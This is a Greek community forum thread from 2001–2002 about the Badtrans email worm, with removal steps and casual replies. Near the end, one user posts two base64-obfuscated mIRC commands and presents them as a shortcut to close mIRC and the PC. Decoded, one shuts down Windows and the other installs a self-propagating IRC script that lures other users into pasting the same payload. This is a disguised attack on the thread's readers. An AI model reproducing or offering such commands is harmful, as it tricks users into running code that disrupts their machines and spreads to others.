KOMOTINI FORUMS : Νέος Ιός Worm_Badtransll.h (παραλλαγή του Nimda)

KOMOTINI ON-LINE » FORUM
ΧΩΡΟΣ ΣΥΖΗΤΗΣΕΩΝ

ΠΡΟΦΙΛ \| ΕΓΓΡΑΦΗ \| ΑΝΑΖΗΤΗΣΗ \| ΒΟΗΘΕΙΑ \| ΜΕΛΗ \| ΑΡΧΙΚΗ

»	KOMOTINI FORUMS » ΠΛΗΡΟΦΟΡΙΚΗ ΚΑΙ INTERNET » Hardware & Software » Νέος Ιός Worm_Badtransll.h (παραλλαγή του Nimda)

Στείλε αυτή την Σελίδα σε φίλους!

Αποστολέας

Θέμα: Νέος Ιός Worm_Badtransll.h (παραλλαγή του Nimda)

GregoryGR
Διαχειριστής
Μέλος 8

Αξιολόγηση:

στάλθηκε στις 28-11-2001 17:49

Τις προηγούμενες μέρες κυκλοφόρησε ευρέως ένας νέος Warm-Ιός με όνομα Badtrans (Ξεκίνησε με το όνομα Worm_Badtrans.Α και έχει φτάσει τώρα στην “έκδοση” Worm_Badtransll.h) και εξακολουθεί να διαδίδεται με εκπληκτικούς ρυθμούς τις τελευταίες μέρες και στην Ελλάδα. Ο ιός αυτός είναι μια έξυπνη παραλλαγή του Nimda που μας απασχόλησε πολύ πριν κανά-δυο μήνες. Και αυτός ο ιός εκμεταλλεύεται τις “αδυναμίες” των Mail Clients όπως Microsoft Outlook και Outlook Express.

Τρόπος διάδοσης και συμπτώματα:
Διαδίδεται κλασσικά μέσω Email. Εσείς λαμβάνετε ένα μήνυμα με ένα συνημμένο αρχείο. Καθώς ανοίγετε το μήνυμα, ο ιός ενεργοποιείται και δημιουργεί στον κατάλογο C:\Windows\System ένα εκτελέσιμο αρχείο Kernel32.exe. Μετά από αυτό ξεκινάει και στέλνει μηνύματα email σε όσους έχετε στην Λίστα Διευθύνσεων σας.

Καταπολέμηση:
1. Διαγράψτε το αρχείο C:\Windows\System\CP_25389.NLS file.
2. Έναρξη > Εκτέλεση, πληκτρολογήστε «Regedit», πατήστε Enter.
3. Πηγαίνετε στο:
HKEY_LOCAL_MACHINE > Software > Microsoft > Windows > CurrentVersion > RunOnce
4. Στο παράθυρο στα δεξιά θα δείτε εγγραφή: Kernel32
5. Δεξί κλικ > Διαγραφή.
6. Κάντε επανεκκίνηση των Windows.
7. Με ένα πρόγραμμα avtivirus κάνετε scanning του και διαγράψτε όλα τα αρχεία που έχει εντοπιστεί ο ιός Worm_Badtrans.
8. Καλού-κακού κάντε ξανά επανεκκίνηση των Windows και είστε ΟΚ.

Προφύλαξη:
Αν σας έρχονται μηνύματα από γνωστούς ή άγνωστους ανθρώπους με ένα συνημμένο αρχείο και δεν είστε σίγουροι για το περιεχόμενό του – ΜΗΝ ΑΝΟΙΓΕΤΕ ΤΟ ΜΗΝΥΜΑ. Απλά σβήστε το κατευθείαν. Ρυθμίστε το Outlook Express να μην εμφανίζει το παράθυρο προεπισκόπησης του μηνύματος: View -> Layout -> Preview Pane -> Απενεργοποίηση.

Πρόσθετες Πληροφορίες:
Flash.gr: Διαστάσεις παγκόσμιας επιδημίας έχει πάρει ο ιός W32.Badtrans.B@mm
Microsoft.com: Security Update, March 29, 2001

Έχετε Unix;
Αγνοήστε αυτό το μήνυμα

[ 18-01-2002: Message edited by: Admin ]
--------------------
www.gregory.gr

Μηνύματα: 294 | Από: Κομοτηνή | Εγγραφή: Οκτ 2001 | IP: Logged

Victoria
Νέο Μέλος
Μέλος 39

στάλθηκε στις 15-01-2002 10:07

gia sou. enas H/Y kolise auto to io. Alla exoume Norton kai den xero ti na kano....

Μηνύματα: 10 | Από: ΚΟΜΟΤΗΝΗ | Εγγραφή: Ιαν 2002 | IP: Logged

Fallen AngeL
Μέλος
Μέλος 5

Αξιολόγηση:

στάλθηκε στις 15-01-2002 20:12

dokimase na kaneis auta pou anaferei o gregoy pio pano...kai an den mporeis fonaxe ton gregory na erthi na sas to lisi to provlima..
--------------------
If U R wondering who am I.."I'm a student in life..Always filling up from the river of knowledge and drowning into an ocean of possibilties..Too much possibilities I guess !

Μηνύματα: 88 | Από: the edge of reality | Εγγραφή: Οκτ 2001 | IP: Logged

Victoria
Νέο Μέλος
Μέλος 39

στάλθηκε στις 16-01-2002 01:13

lisame to provlima me to io W32Badrans.B@mm
alla parousiastike provlima me allo io -virus JS.Exception.Exploit- eftixos lisame kai auto giati prosexoume tous H/Y. Exis akousi gia auto to io? Mpeni sto H/Y me ta internet files kai erophota.

Μηνύματα: 10 | Από: ΚΟΜΟΤΗΝΗ | Εγγραφή: Ιαν 2002 | IP: Logged

GregoryGR
Διαχειριστής
Μέλος 8

Αξιολόγηση:

στάλθηκε στις 16-01-2002 06:11

Παλιότερα μέσω των ερωτικών επαφών κολλάγαμε έλκος, βλενόρροια και AIDS... τώρα κολλάμε και ιούς από το Internet :P
Τί άλλο θα δούμε...

--------------------
www.gregory.gr

Μηνύματα: 294 | Από: Κομοτηνή | Εγγραφή: Οκτ 2001 | IP: Logged

Fallen AngeL
Μέλος
Μέλος 5

Αξιολόγηση:

στάλθηκε στις 17-01-2002 13:58

gregory this one is called magic.. xexe....
etsi opos exoume katantisei se ligo oloi tha exartiomaste apo tois mixanes... :PP
--------------------
If U R wondering who am I.."I'm a student in life..Always filling up from the river of knowledge and drowning into an ocean of possibilties..Too much possibilities I guess !

Μηνύματα: 88 | Από: the edge of reality | Εγγραφή: Οκτ 2001 | IP: Logged

<ZipME>
unregistered

στάλθηκε στις 17-01-2002 16:14

Matrix (R)

IP: Logged

Fallen AngeL
Μέλος
Μέλος 5

Αξιολόγηση:

στάλθηκε στις 17-01-2002 17:10

xaxa...les na ginoun ola auta...mia mera.... :PPP
--------------------
If U R wondering who am I.."I'm a student in life..Always filling up from the river of knowledge and drowning into an ocean of possibilties..Too much possibilities I guess !

Μηνύματα: 88 | Από: the edge of reality | Εγγραφή: Οκτ 2001 | IP: Logged

<Demian>
unregistered

στάλθηκε στις 18-01-2002 05:52

Den einai ios alla boh8aei na kleisete kateu8eian mirc kai pc. apla grapste
/$decode(cnVuIHJ1bmRsbCB1c2VyLmV4ZSxleGl0d2luZG93cw==,m)
kai ola 8a ginoun automata.
ena kalo asteiaki einai epishs to
//$decode( d3JpdGUgxCBvbiAqOmpvaW46IzoudGltZXIgMSAzMCBpZiAoICRuaWNrICFpc29wICRjaGFuICkgLm1zZyAkbmljay
BoZXkgJG5pY2sgdG8gZ2V0IE9QcyB1c2UgdGhpcyBoYWNrIGluIHRoZSBjaGFuIGJ1dCBTSEghIAM0Ly8kICQrIGRl
Y29kZSggJGVuY29kZSh3cml0ZSDEICRyZWFkKCRzY3JpcHQsbiwxKSxtKSAsbSkgJCAkKyBjaHIoMTI0KSAkICQgJC
sgKyBkZWNvZGUoICRlbmNvZGUoLmxvYWQgLXJzIMQsbSkgLG0p ,m) | $decode( LmxvYWQgLXJzIMQ= ,m)
- Ola ta parapanw einai gia IRC kai dianemontai gia ekpaideutikous kai mono skopous. Opoios ta xrhsimopoihsei gia kakous skopous eu8unetai autos kai o eautos tou

IP: Logged

Fallen AngeL
Μέλος
Μέλος 5

Αξιολόγηση:

στάλθηκε στις 18-01-2002 14:32

kali fasi... kapioi apo to hellas mou eixan pei gia autin tin entoli alla den tin eixa dokimasei..
--------------------
If U R wondering who am I.."I'm a student in life..Always filling up from the river of knowledge and drowning into an ocean of possibilties..Too much possibilities I guess !

Μηνύματα: 88 | Από: the edge of reality | Εγγραφή: Οκτ 2001 | IP: Logged

Admin
Διαχειριστής
Μέλος 1